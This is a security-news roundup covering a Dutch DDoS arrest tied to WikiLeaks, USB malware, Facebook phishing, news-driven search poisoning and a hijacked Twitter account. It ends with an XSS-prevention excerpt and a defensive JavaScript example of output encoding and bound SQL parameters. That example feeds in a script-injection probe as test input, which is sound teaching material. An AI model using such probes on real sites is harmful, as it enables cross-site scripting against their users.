Denial-of-service attacks are illegal in many countries, and in The Netherlands can result in a maximum sentence of six years in jail.

Prosecutors claim that the man also participated in a DDoS attack against the website Moneybookers.com, which took the website offline for a period of time on Friday. Moneybookers.com terminated its relationship with WikiLeaks in August.

The ongoing saga of WikiLeaks is, of course, a controversial one that is generating strong emotions on both sides. Even if you feel strongly that WikiLeaks is being persecuted or abandoned by online companies, think very carefully before volunteering your PC and engaging in a DDoS attack.

After all, it could be that the police are knocking on your door next.

Many malware attacks triggered by USB devices

One in every eight malware attacks occurs via a USB device, often targeting the Windows AutoRun function, according to security vendor Avast Software. – on Computerworld Security News

Facebook used for phishing attacks and open redirects

Recently, at Websense Security Labs, we have seen Facebook being used to
display phishing pages for different services, as well as to redirect
to phishing pages hosted elsewhere. Below are two examples of what
the phishing attempts look like…

…(read more) – Patrik Runald on Security Labs

Fidelis XPS: Preventing Cyber Attacks with Real-Time Threat Intelligence

Check out this quick demonstration of what’s new in Fidelis XPS, including reputational feeds from Fidelis and Cyveillance! Read the whitepaper: goo.gl

Attackers using Prince William engagement for attacks

It didn't take long for attackers to take advantage of the big news that Prince William and Kate Middleton are getting married. As we have explained before, attackers have the process down to a science. They monitor breaking news, trending topics, and buzz words, then automatically manipulate search results based on what's happening in the world. Websense customers are protected against this attack through our Advanced Classification Engine.

As we discussed in our 2010 Threat Report, searching for news and buzz words is now more dangerous than searching for adult content, with approximately 22.4% of all searches for current news leading to malicious search results. And that's in the top 100 results!

The result when clicking on one of the malicious links is exactly the same as with last week's Veteran's Day scams. As always, make sure you go to reputable sites when looking for news. Don't just do random searches.

Source: Security Labs

Kirstie Allsopp’s Twitter account compromised, attacks Sir Alan Sugar

There were some very peculiar goings-on in Twitter land today, as the account of Kirstie Allsopp seemed to be taking potshots at Sir Alan Sugar.

The only problem? She didn’t post that message, despite a bit of confusion and the fact that the pair of them had a very public argument recently.

It seems like it might be an easy thing to work out: so far, the compromiser is apparently making all of their posts from an iPhone.

Not so long ago, her account was hijacked and started sending out iPad spam. Methinks this time around she’ll be lucky not to get a “You’re fired” from Sir Alan…

Christopher Boyd

View full post on Sunbelt Blog

“Input validation is not a great solution for [web application] injection attacks. First, input…”

“Input validation is not a great solution for [web application] injection attacks. First, input validation is typically done when the data is received, before the destination is known. That means that we don’t know which characters might be significant in the target interpreter. Second, […] applications must allow potentially harmful characters in. For example, should poor Mr. O’Malley be prevented from registering in the database simply because SQL considers ’ a special character?”

An excerpt from XSS (Cross Site Scripting) Prevention Cheat Sheet by Jeff Williams and Jim Manico

View full post on Lenny Zeltser on Information Security
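
As an added illustration of the point in the excerpt (my code, not the cheat sheet’s), the snippet below validates only business rules on the way in and lets the apostrophe through, then encodes for the HTML interpreter at render time and hands the value to the SQL layer as a bound parameter. The `{ text, values }` statement shape and the `$1` placeholder are assumptions modelled on common Node database drivers; no database is contacted.

```javascript
// Added example, not from the cheat sheet: permissive input validation,
// with escaping decided at the point where the destination is known.

// Encode for an HTML text or quoted-attribute context. Each character that
// can open markup or close a quoted attribute becomes an entity.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function encodeForHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => HTML_ENTITIES[c]);
}

// Input validation enforces only what the business rule needs (a non-empty
// name of bounded length). It does not reject ' because the destination is
// unknown at this point, exactly the situation the excerpt describes.
function validateDisplayName(name) {
  if (typeof name !== 'string') throw new TypeError('name must be a string');
  const trimmed = name.trim();
  if (trimmed.length === 0 || trimmed.length > 64) {
    throw new RangeError('name length out of bounds');
  }
  return trimmed;
}

// SQL destination: the value travels as a bound parameter, so the apostrophe
// in O'Malley is data rather than syntax. (Statement shape is an assumption.)
function buildInsertUser(name) {
  return { text: 'INSERT INTO users (display_name) VALUES ($1)', values: [name] };
}

// HTML destination: encode when rendering, now that the interpreter is known.
function renderGreeting(name) {
  return `<p>Welcome, <span class="user">${encodeForHtml(name)}</span>!</p>`;
}

function registerAndRender(rawName) {
  const name = validateDisplayName(rawName);
  return { statement: buildInsertUser(name), html: renderGreeting(name) };
}

// Constructed inputs: a legitimate name with an apostrophe and a markup probe.
for (const input of ["O'Malley", '<script>alert(1)</script>']) {
  const r = registerAndRender(input);
  console.log(r.statement.values[0], '->', r.html);
}

module.exports = { encodeForHtml, validateDisplayName, buildInsertUser, renderGreeting, registerAndRender };
```

Mr. O’Malley registers and is greeted with his name intact, while the markup probe is stored verbatim but rendered inert; the same stored string would need a different encoder for a JavaScript or URL context, which is the reason the decision is deferred until output.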
